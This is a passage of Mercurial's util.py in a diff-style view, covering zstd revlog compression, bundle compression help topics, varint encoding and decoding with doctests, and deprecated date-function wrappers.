3801 dctx = zstd.ZstdDecompressor()
3796 return chunkbuffer(dctx.read_from(fh))
3802 return chunkbuffer(dctx.read_from(fh))
3797
3803
3798 class zstdrevlogcompressor(object):
3804 class zstdrevlogcompressor(object):
3799 def __init__(self, zstd, level=3):
3805 def __init__(self, zstd, level=3):
3800 # Writing the content size adds a few bytes to the output. However,
3806 # Writing the content size adds a few bytes to the output. However,
3801 # it allows decompression to be more optimal since we can
3807 # it allows decompression to be more optimal since we can
3802 # pre-allocate a buffer to hold the result.
3808 # pre-allocate a buffer to hold the result.
3803 self._cctx = zstd.ZstdCompressor(level=level,
3809 self._cctx = zstd.ZstdCompressor(level=level,
3804 write_content_size=True)
3810 write_content_size=True)
3805 self._dctx = zstd.ZstdDecompressor()
3811 self._dctx = zstd.ZstdDecompressor()
3806 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3812 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3807 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3813 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3808
3814
3809 def compress(self, data):
3815 def compress(self, data):
3810 insize = len(data)
3816 insize = len(data)
3811 # Caller handles empty input case.
3817 # Caller handles empty input case.
3812 assert insize > 0
3818 assert insize > 0
3813
3819
3814 if insize < 50:
3820 if insize < 50:
3815 return None
3821 return None
3816
3822
3817 elif insize <= 1000000:
3823 elif insize <= 1000000:
3818 compressed = self._cctx.compress(data)
3824 compressed = self._cctx.compress(data)
3819 if len(compressed) < insize:
3825 if len(compressed) < insize:
3820 return compressed
3826 return compressed
3821 return None
3827 return None
3822 else:
3828 else:
3823 z = self._cctx.compressobj()
3829 z = self._cctx.compressobj()
3824 chunks = []
3830 chunks = []
3825 pos = 0
3831 pos = 0
3826 while pos < insize:
3832 while pos < insize:
3827 pos2 = pos + self._compinsize
3833 pos2 = pos + self._compinsize
3828 chunk = z.compress(data[pos:pos2])
3834 chunk = z.compress(data[pos:pos2])
3829 if chunk:
3835 if chunk:
3830 chunks.append(chunk)
3836 chunks.append(chunk)
3831 pos = pos2
3837 pos = pos2
3832 chunks.append(z.flush())
3838 chunks.append(z.flush())
3833
3839
3834 if sum(map(len, chunks)) < insize:
3840 if sum(map(len, chunks)) < insize:
3835 return ''.join(chunks)
3841 return ''.join(chunks)
3836 return None
3842 return None
3837
3843
3838 def decompress(self, data):
3844 def decompress(self, data):
3839 insize = len(data)
3845 insize = len(data)
3840
3846
3841 try:
3847 try:
3842 # This was measured to be faster than other streaming
3848 # This was measured to be faster than other streaming
3843 # decompressors.
3849 # decompressors.
3844 dobj = self._dctx.decompressobj()
3850 dobj = self._dctx.decompressobj()
3845 chunks = []
3851 chunks = []
3846 pos = 0
3852 pos = 0
3847 while pos < insize:
3853 while pos < insize:
3848 pos2 = pos + self._decompinsize
3854 pos2 = pos + self._decompinsize
3849 chunk = dobj.decompress(data[pos:pos2])
3855 chunk = dobj.decompress(data[pos:pos2])
3850 if chunk:
3856 if chunk:
3851 chunks.append(chunk)
3857 chunks.append(chunk)
3852 pos = pos2
3858 pos = pos2
3853 # Frame should be exhausted, so no finish() API.
3859 # Frame should be exhausted, so no finish() API.
3854
3860
3855 return ''.join(chunks)
3861 return ''.join(chunks)
3856 except Exception as e:
3862 except Exception as e:
3857 raise error.RevlogError(_('revlog decompress error: %s') %
3863 raise error.RevlogError(_('revlog decompress error: %s') %
3858 forcebytestr(e))
3864 forcebytestr(e))
3859
3865
3860 def revlogcompressor(self, opts=None):
3866 def revlogcompressor(self, opts=None):
3861 opts = opts or {}
3867 opts = opts or {}
3862 return self.zstdrevlogcompressor(self._module,
3868 return self.zstdrevlogcompressor(self._module,
3863 level=opts.get('level', 3))
3869 level=opts.get('level', 3))
3864
3870
3865 compengines.register(_zstdengine())
3871 compengines.register(_zstdengine())
3866
3872
3867 def bundlecompressiontopics():
3873 def bundlecompressiontopics():
3868 """Obtains a list of available bundle compressions for use in help."""
3874 """Obtains a list of available bundle compressions for use in help."""
3869 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3875 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3870 items = {}
3876 items = {}
3871
3877
3872 # We need to format the docstring. So use a dummy object/type to hold it
3878 # We need to format the docstring. So use a dummy object/type to hold it
3873 # rather than mutating the original.
3879 # rather than mutating the original.
3874 class docobject(object):
3880 class docobject(object):
3875 pass
3881 pass
3876
3882
3877 for name in compengines:
3883 for name in compengines:
3878 engine = compengines[name]
3884 engine = compengines[name]
3879
3885
3880 if not engine.available():
3886 if not engine.available():
3881 continue
3887 continue
3882
3888
3883 bt = engine.bundletype()
3889 bt = engine.bundletype()
3884 if not bt or not bt[0]:
3890 if not bt or not bt[0]:
3885 continue
3891 continue
3886
3892
3887 doc = pycompat.sysstr('``%s``\n %s') % (
3893 doc = pycompat.sysstr('``%s``\n %s') % (
3888 bt[0], engine.bundletype.__doc__)
3894 bt[0], engine.bundletype.__doc__)
3889
3895
3890 value = docobject()
3896 value = docobject()
3891 value.__doc__ = doc
3897 value.__doc__ = doc
3892 value._origdoc = engine.bundletype.__doc__
3898 value._origdoc = engine.bundletype.__doc__
3893 value._origfunc = engine.bundletype
3899 value._origfunc = engine.bundletype
3894
3900
3895 items[bt[0]] = value
3901 items[bt[0]] = value
3896
3902
3897 return items
3903 return items
3898
3904
3899 i18nfunctions = bundlecompressiontopics().values()
3905 i18nfunctions = bundlecompressiontopics().values()
3900
3906
3901 # convenient shortcut
3907 # convenient shortcut
3902 dst = debugstacktrace
3908 dst = debugstacktrace
3903
3909
3904 def safename(f, tag, ctx, others=None):
3910 def safename(f, tag, ctx, others=None):
3905 """
3911 """
3906 Generate a name that it is safe to rename f to in the given context.
3912 Generate a name that it is safe to rename f to in the given context.
3907
3913
3908 f: filename to rename
3914 f: filename to rename
3909 tag: a string tag that will be included in the new name
3915 tag: a string tag that will be included in the new name
3910 ctx: a context, in which the new name must not exist
3916 ctx: a context, in which the new name must not exist
3911 others: a set of other filenames that the new name must not be in
3917 others: a set of other filenames that the new name must not be in
3912
3918
3913 Returns a file name of the form oldname~tag[~number] which does not exist
3919 Returns a file name of the form oldname~tag[~number] which does not exist
3914 in the provided context and is not in the set of other names.
3920 in the provided context and is not in the set of other names.
3915 """
3921 """
3916 if others is None:
3922 if others is None:
3917 others = set()
3923 others = set()
3918
3924
3919 fn = '%s~%s' % (f, tag)
3925 fn = '%s~%s' % (f, tag)
3920 if fn not in ctx and fn not in others:
3926 if fn not in ctx and fn not in others:
3921 return fn
3927 return fn
3922 for n in itertools.count(1):
3928 for n in itertools.count(1):
3923 fn = '%s~%s~%s' % (f, tag, n)
3929 fn = '%s~%s~%s' % (f, tag, n)
3924 if fn not in ctx and fn not in others:
3930 if fn not in ctx and fn not in others:
3925 return fn
3931 return fn
3926
3932
3927 def readexactly(stream, n):
3933 def readexactly(stream, n):
3928 '''read n bytes from stream.read and abort if less was available'''
3934 '''read n bytes from stream.read and abort if less was available'''
3929 s = stream.read(n)
3935 s = stream.read(n)
3930 if len(s) < n:
3936 if len(s) < n:
3931 raise error.Abort(_("stream ended unexpectedly"
3937 raise error.Abort(_("stream ended unexpectedly"
3932 " (got %d bytes, expected %d)")
3938 " (got %d bytes, expected %d)")
3933 % (len(s), n))
3939 % (len(s), n))
3934 return s
3940 return s
3935
3941
3936 def uvarintencode(value):
3942 def uvarintencode(value):
3937 """Encode an unsigned integer value to a varint.
3943 """Encode an unsigned integer value to a varint.
3938
3944
3939 A varint is a variable length integer of 1 or more bytes. Each byte
3945 A varint is a variable length integer of 1 or more bytes. Each byte
3940 except the last has the most significant bit set. The lower 7 bits of
3946 except the last has the most significant bit set. The lower 7 bits of
3941 each byte store the 2's complement representation, least significant group
3947 each byte store the 2's complement representation, least significant group
3942 first.
3948 first.
3943
3949
3944 >>> uvarintencode(0)
3950 >>> uvarintencode(0)
3945 '\\x00'
3951 '\\x00'
3946 >>> uvarintencode(1)
3952 >>> uvarintencode(1)
3947 '\\x01'
3953 '\\x01'
3948 >>> uvarintencode(127)
3954 >>> uvarintencode(127)
3949 '\\x7f'
3955 '\\x7f'
3950 >>> uvarintencode(1337)
3956 >>> uvarintencode(1337)
3951 '\\xb9\\n'
3957 '\\xb9\\n'
3952 >>> uvarintencode(65536)
3958 >>> uvarintencode(65536)
3953 '\\x80\\x80\\x04'
3959 '\\x80\\x80\\x04'
3954 >>> uvarintencode(-1)
3960 >>> uvarintencode(-1)
3955 Traceback (most recent call last):
3961 Traceback (most recent call last):
3956 ...
3962 ...
3957 ProgrammingError: negative value for uvarint: -1
3963 ProgrammingError: negative value for uvarint: -1
3958 """
3964 """
3959 if value < 0:
3965 if value < 0:
3960 raise error.ProgrammingError('negative value for uvarint: %d'
3966 raise error.ProgrammingError('negative value for uvarint: %d'
3961 % value)
3967 % value)
3962 bits = value & 0x7f
3968 bits = value & 0x7f
3963 value >>= 7
3969 value >>= 7
3964 bytes = []
3970 bytes = []
3965 while value:
3971 while value:
3966 bytes.append(pycompat.bytechr(0x80 | bits))
3972 bytes.append(pycompat.bytechr(0x80 | bits))
3967 bits = value & 0x7f
3973 bits = value & 0x7f
3968 value >>= 7
3974 value >>= 7
3969 bytes.append(pycompat.bytechr(bits))
3975 bytes.append(pycompat.bytechr(bits))
3970
3976
3971 return ''.join(bytes)
3977 return ''.join(bytes)
3972
3978
3973 def uvarintdecodestream(fh):
3979 def uvarintdecodestream(fh):
3974 """Decode an unsigned variable length integer from a stream.
3980 """Decode an unsigned variable length integer from a stream.
3975
3981
3976 The passed argument is anything that has a ``.read(N)`` method.
3982 The passed argument is anything that has a ``.read(N)`` method.
3977
3983
3978 >>> try:
3984 >>> try:
3979 ... from StringIO import StringIO as BytesIO
3985 ... from StringIO import StringIO as BytesIO
3980 ... except ImportError:
3986 ... except ImportError:
3981 ... from io import BytesIO
3987 ... from io import BytesIO
3982 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3988 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3983 0
3989 0
3984 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3990 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3985 1
3991 1
3986 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3992 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3987 127
3993 127
3988 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3994 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3989 1337
3995 1337
3990 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3996 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3991 65536
3997 65536
3992 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3998 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3993 Traceback (most recent call last):
3999 Traceback (most recent call last):
3994 ...
4000 ...
3995 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4001 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3996 """
4002 """
3997 result = 0
4003 result = 0
3998 shift = 0
4004 shift = 0
3999 while True:
4005 while True:
4000 byte = ord(readexactly(fh, 1))
4006 byte = ord(readexactly(fh, 1))
4001 result |= ((byte & 0x7f) << shift)
4007 result |= ((byte & 0x7f) << shift)
4002 if not (byte & 0x80):
4008 if not (byte & 0x80):
4003 return result
4009 return result
4004 shift += 7
4010 shift += 7
4005
4011
4006 ###
4012 ###
4007 # Deprecation warnings for util.py splitting
4013 # Deprecation warnings for util.py splitting
4008 ###
4014 ###
4009
4015
4010 defaultdateformats = dateutil.defaultdateformats
4016 defaultdateformats = dateutil.defaultdateformats
4011
4017
4012 extendeddateformats = dateutil.extendeddateformats
4018 extendeddateformats = dateutil.extendeddateformats
4013
4019
4014 def makedate(*args, **kwargs):
4020 def makedate(*args, **kwargs):
4015 msg = ("'util.makedate' is deprecated, "
4021 msg = ("'util.makedate' is deprecated, "
4016 "use 'utils.dateutil.makedate'")
4022 "use 'utils.dateutil.makedate'")
4017 nouideprecwarn(msg, "4.6")
4023 nouideprecwarn(msg, "4.6")
4018 return dateutil.makedate(*args, **kwargs)
4024 return dateutil.makedate(*args, **kwargs)
4019
4025
4020 def datestr(*args, **kwargs):
4026 def datestr(*args, **kwargs):
4021 msg = ("'util.datestr' is deprecated, "
4027 msg = ("'util.datestr' is deprecated, "
4022 "use 'utils.dateutil.datestr'")
4028 "use 'utils.dateutil.datestr'")
4023 nouideprecwarn(msg, "4.6")
4029 nouideprecwarn(msg, "4.6")
4024 debugstacktrace()
4030 debugstacktrace()
4025 return dateutil.datestr(*args, **kwargs)
4031 return dateutil.datestr(*args, **kwargs)
4026
4032
4027 def shortdate(*args, **kwargs):
4033 def shortdate(*args, **kwargs):
4028 msg = ("'util.shortdate' is deprecated, "
4034 msg = ("'util.shortdate' is deprecated, "
4029 "use 'utils.dateutil.shortdate'")
4035 "use 'utils.dateutil.shortdate'")
4030 nouideprecwarn(msg, "4.6")
4036 nouideprecwarn(msg, "4.6")
4031 return dateutil.shortdate(*args, **kwargs)
4037 return dateutil.shortdate(*args, **kwargs)
4032
4038
4033 def parsetimezone(*args, **kwargs):
4039 def parsetimezone(*args, **kwargs):
4034 msg = ("'util.parsetimezone' is deprecated, "
4040 msg = ("'util.parsetimezone' is deprecated, "
4035 "use 'utils.dateutil.parsetimezone'")
4041 "use 'utils.dateutil.parsetimezone'")
4036 nouideprecwarn(msg, "4.6")
4042 nouideprecwarn(msg, "4.6")
4037 return dateutil.parsetimezone(*args, **kwargs)
4043 return dateutil.parsetimezone(*args, **kwargs)
4038
4044
4039 def strdate(*args, **kwargs):
4045 def strdate(*args, **kwargs):
4040 msg = ("'util.strdate' is deprecated, "
4046 msg = ("'util.strdate' is deprecated, "
4041 "use 'utils.dateutil.strdate'")
4047 "use 'utils.dateutil.strdate'")
4042 nouideprecwarn(msg, "4.6")
4048 nouideprecwarn(msg, "4.6")
4043 return dateutil.strdate(*args, **kwargs)
4049 return dateutil.strdate(*args, **kwargs)
4044
4050
4045 def parsedate(*args, **kwargs):
4051 def parsedate(*args, **kwargs):
4046 msg = ("'util.parsedate' is deprecated, "
4052 msg = ("'util.parsedate' is deprecated, "
4047 "use 'utils.dateutil.parsedate'")
4053 "use 'utils.dateutil.parsedate'")
4048 nouideprecwarn(msg, "4.6")
4054 nouideprecwarn(msg, "4.6")
4049 return dateutil.parsedate(*args, **kwargs)
4055 return dateutil.parsedate(*args, **kwargs)
4050
4056
4051 def matchdate(*args, **kwargs):
4057 def matchdate(*args, **kwargs):
4052 msg = ("'util.matchdate' is deprecated, "
4058 msg = ("'util.matchdate' is deprecated, "
4053 "use 'utils.dateutil.matchdate'")
4059 "use 'utils.dateutil.matchdate'")
4054 nouideprecwarn(msg, "4.6")
4060 nouideprecwarn(msg, "4.6")
4055 return dateutil.matchdate(*args, **kwargs)
4061 return dateutil.matchdate(*args, **kwargs)
General Comments 0
You need to be logged in to leave comments. Login now